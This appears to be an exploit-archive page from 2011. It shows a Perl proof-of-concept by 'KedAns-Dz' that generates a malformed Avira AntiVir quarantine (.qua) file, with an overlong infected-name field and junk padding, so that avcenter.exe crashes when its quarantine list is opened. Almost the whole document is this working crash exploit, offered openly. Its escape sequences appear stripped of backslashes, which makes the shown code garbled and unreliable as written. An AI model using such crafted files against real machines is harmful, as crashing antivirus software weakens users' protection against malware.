Avira AntVir QUA file in (avcenter.exe) Local Crash PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Avira AntVir QUA file in (avcenter.exe) Local Crash PoC
# Published : 2011-02-19
# Author : KedAns-Dz
# Previous Title : MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
# Next Title : IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability

#!/usr/bin/perl
#================================================================================= |                
#| # Title    : Avira AntVir QUA file in ( avcenter.exe) Local Crash PoC                                            |
#| # Author   : KedAns-Dz                                                                                                                         |
#| # email    : Ked-h@hotmail.com                                                                                                            |
#| # Home     : HMD/AM (30500/04300) - Algeria -(00213555248701)                                         |
#| # Web Site : /(~_-) ...                                                                                                                        |
#| # Tested on : windows XP SP3 Fran?ais & Arabic                                                                             |
#| # Target SFW : Avira Anti Virus Version 10.00.12.28                                                                     | 
#| # Info : Copy the QUA file in :                                                                                                         |
#          ....All UsersApplication DataAviraAntiVir DesktopINFECTED                                     |
#    > You are Opening The avcenter.exe and show Quarantine list                                                     |
#                          the avcenter is Task kill and Show Crash Error                                                         |
#======================      Exploit By KedAns-Dz       =================================  |
# Perl File  : 
#----------------------------------
#START SYSTEM /root@MSdos/ : 
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "nn".                  
      "      ||========================================||n".
	  "      ||                                        ||n".
	  "      ||   Avira AntVir Local Crash PoC         ||n".
	  "      ||      Exploit Buffer Overflow           ||n".
	  "      ||    Created BY KedAns-Dz                ||n".
	  "      ||   ked-h(at)hotmail(dot)com             ||n".
	  "      ||                                        ||n".
	  "      ||========================================||nnn";
sleep(2);
print "n";
my $Buf = 
"x41x6ex74x69x56x69x72x20x51x75x61x00x00x00x00x00".
"x46x01x00x00x6ax00x00x00x00x00x00x00x01x00x00x00".
"x00x00x00x00x01x00x00x00x05x00x00x00x01x00x00x00".
"x00x00x00x00x28x00x00x02x00x00x0ex04x69x4cx00x00".
"x00x00x00x00x00x00x00x00x00x00x08x00x00x00x02x00".
"x00x07x00x00x00x42".
"x00" x 51 .
"x4bx65x64x40x41x6ex73x2fx41x76x32x42x6fx46x2ex50x6cx7c". # Infected Name
"x31" x 378 . # Bad Multi Number
"x00" x 48 .
"x5cx00x5cx00x3fx00x5cx00x43x00x3ax00x5cx00x4bx00x2ex00x44x00x7a" . # Path V-Qua
"x41" x 380 ; # Junk
$file = "4fkedans.qua";
open (F ,">$file");
print F $Buf;
sleep (2);
print "n Creat File : $file , Succesfully ! n";
close (F);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[?] Team :  [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers <                 |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends ..    | 
#------------------------------------------------------------------------------|